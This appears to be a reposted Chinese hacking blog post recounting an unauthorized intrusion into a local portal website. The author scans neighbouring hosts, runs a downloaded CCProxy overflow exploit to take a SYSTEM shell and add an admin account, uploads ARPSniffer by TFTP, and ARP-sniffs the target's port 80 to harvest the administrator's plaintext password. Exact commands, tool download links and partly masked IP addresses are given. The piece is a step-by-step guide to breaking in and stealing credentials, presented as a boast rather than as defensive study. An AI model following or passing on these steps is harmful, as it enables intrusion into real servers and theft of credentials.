zoukankan      html  css  js  c++  java
  • 巧用嗅探 玩“渗透”(图)

    还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗?自从上次入侵之后,网站的管理员想尽了办法堵住了所有SQL注入漏洞,想通过SQL 注入后台管理页面已经没有可能了。真是郁闷,但是转念一想,这正是一个练习技术的好机会,难道除了简单的工具利用外,我就没有其它的办法了吗?一定要想法 子再次拿下这个站点。 一、扫描,突现新曙光 想来想去找不到什么好的办法,闲着也无事,于是习惯性的用X-scan扫描了一下与本地信息港(203.207.***.2)位于同一C段的IP地址。结 果在扫描到的结果中发现有许多存活主机,而且其中有一些主机好像还有系统漏洞可以利用。唉,只可惜这些主机都不是我要进攻的目标! 面对扫描出来 的结果发了好久的呆,突然大脑中灵光一闪冒出了一个念头:这些网站中说不定有某个与信息港位于同一个交换机内呢!如果我能进入控制与信息港位于同一交换机 下的站点,就可以利用小榕哥的另外一个工具ARPSniffer.EXE,监听信息港站点中的一举一动,如果能嗅探到通过80端口传输到信息港的网站管理 员密码,不就成功地搞定信息港了吗?看来方案可行!于是我开始了又一轮攻击。 二、利用溢出漏洞拿下第一站 在扫描到的C段IP地址中试验了几个站点,第一个站点居然还有SA空口令的漏洞,可惜连接上去后发现与信息港并不在同一个交换机下。另一个站点存在 Serv-U溢出漏洞,可惜也无法利用。剩下的其它网站好像看不出有什么问题来,只有一个网站(203.207.***.44)有些奇怪,在端口扫描结果 中发现它好像开放了“TCP 808”端口。也不知道这个奇怪的端口是拿来做什么的(如图1)? 图1 javascript:if(this.width>500)this.width=500" border=0> 于是上Google搜索了一下,呵呵,这下收获可大了!从搜索结果了解到,原来808端口是网站中一个叫作CCProxy的软件打开的。CCProxy是 国内一个常用的代理服务器软件,它可以轻松建立各种代理服务器,国内的许多企业都使用它代理上网,记得当初我还用它将一台肉鸡建成了一个全能的代理服务 器,怎么就给忘记了呢?恰巧被扫描的网站也是一个企业站点,看来这个网站的808端口十有八九是CCProxy打开的啦。最重要的是从网上还了解到这个 CCProxy代理服务器软件刚发现了一个最新的远程漏洞,于是赶紧下载了一个溢出程序试试(下载地址:ttp://www.nuoya.org /down/soft/CCProxy.rar)。 (小提示:CCProxy打开的端口可能还有1080、2121等,这些是用来提供Socks和FTP服务的。) CCProxy溢出程序的使用非常简单,在命令窗口中输入“ccpx 目标IP地址 端口”,然后按提示操作即可(如图2)。在溢出中会询问本机是与攻击目标位于同一个IP段;如果是在同一IP地址段中的话,直接按“y”,就可以开始溢出 了;如果本机与攻击目标不在一个IP地址段中的话,按下“n”,溢出程序将继续提示并询问本机是否有一个公网IP地址(如图3),如果没有的话,还需要手 工输入自己的网关IP地址才可以开始溢出。溢出成功后,会在当前命令窗口中自动连接攻击目标的24876端口,获得远程主机的一个SYSTEM Shell。剩下来的事就是建立管理员帐号,常常的掌握这台肉机。 图2 javascript:if(this.width>500)this.width=500" border=0> 图3 javascript:if(this.width>500)this.width=500" border=0> 三、上传嗅探利器ARPSniffer 现在要通过手里的肉鸡入侵信息港了。首先还是要查看一下两个网站服务器是不是位于同一个交换机下。远程连接肉机,在肉鸡的CMD窗口中输入命令 “tracert 攻击目标IP地址”,令人兴奋的是看到直接返回了目标IP地址(如图4),现在可以确定两台主机都在同一交换机下了,看来有戏啦!可以考虑用嗅探的方法从 肉鸡上获取信息港的管理员密码或者其它有用的信息。现在要用到的是一个名叫“ARPSniffer.exe”的软件(下载地 址:http://admin.cnxhacker.net/Soft/uploadsoft/200409/arpsniffer.rar)。这个软件 有DOS版和WIN版,RPSniffer也是小榕哥开发的一款工具非常好的嗅探工具,它可以用在交换机的环境下。在使用这个嗅探工具前首先要使用机器上 安装WinPCAP驱动。怎么上传ARPSniffer到肉鸡上?还是老方法用TFTP传送。在本机上运行Tfpd32,将本机建成为一个TFTP服务 器,点击界面中的“Browse”按钮,选择ARPSniffer下载压缩包的解压路径(如图5),然后在肉鸡的命令窗口中运行“Get -i TFTP服务器IP地址 文件名”即可。在这里下载后的压缩包中有两个版本的程序,我们只需要上传“arpsniffer.exe”和“WinPcap_3_0_a.exe”即 可。上传成功后先运行“WinPcap_3_0_a.exe”安装嗅探驱动程序。 图4 javascript:if(this.width>500)this.width=500" border=0> 图5 javascript:if(this.width>500)this.width=500" border=0> 四、利用ARPSniffer渗透攻击真正目标 现在是万事具备,只欠嗅探。先在命令窗口中运行“Ipconfig /all”命令,查看一下肉鸡上的网址配置情况和网关IP地址(如图6)。可以查到网关(Default Gateway)为“203.207.***.1”,运行ARPSniffer命令: “Arpsniffer 203.207.***.1 203.207.***.2 80 c:\password.txt”; 即 可开始在肉鸡上监听攻击目标IP的80端口了(如图7)。攻击目标IP上所有通过80端口收发的密码将被保存在“Password.txt”文件中。在嗅 探时需要注意,如果在肉鸡上安装有两块网卡的话,还要在刚才的Arpsniffer命令后加上数字参数指定嗅探的网卡ID。 图6 javascript:if(this.width>500)this.width=500" border=0> 图7 javascript:if(this.width>500)this.width=500" border=0> (小提示:当然我们也可以嗅探其它的端口,如21和25端口等获得Telnet密码。但是由于管理员以Web方式登录的几率较大些,所以我们选择了嗅探80Web端口。) 五、获得管理员密码 最后剩下来的事情就是坐着等待攻击目标网站上的管理员登录了。很快就看到了肉鸡上的命令窗口中有了反应,打开“password.txt”就可以看到密 码。不过由于我们还在监听过程中,所以“password.txt”文件是无法直接打开的,而且也不能复制。想要查看密码记录文件,必须先终止嗅探进程。 可以在肉鸡嗅探窗口中直接按下“Ctrl+C”键,就可以中止嗅探了。不过可能同时也会将我们在本机与肉鸡建立的连接窗口关闭掉了。结束后看一看,呵呵, 真的有收获啦,网站管理的密码都以明文的方式保存在文本里面啦!现在还等什么呢?又可以以管理员身份登入信息港故地重游啦!
  • 相关阅读:
    linux机器,docker安装mysql
    一次完整的http请求过程
    mac 安装git
    mac下安装maven和IntelliJ IDEA
    小米老手机 安装charles的https证书 MI NOTE LTE
    mac搭建node环境
    python&kafka集群取消息
    mac电脑破解pycharm
    pytest安装
    sql group by 和 定义输出的小数位数
  • 原文地址:https://www.cnblogs.com/adodo1/p/4327627.html
Copyright © 2011-2022 走看看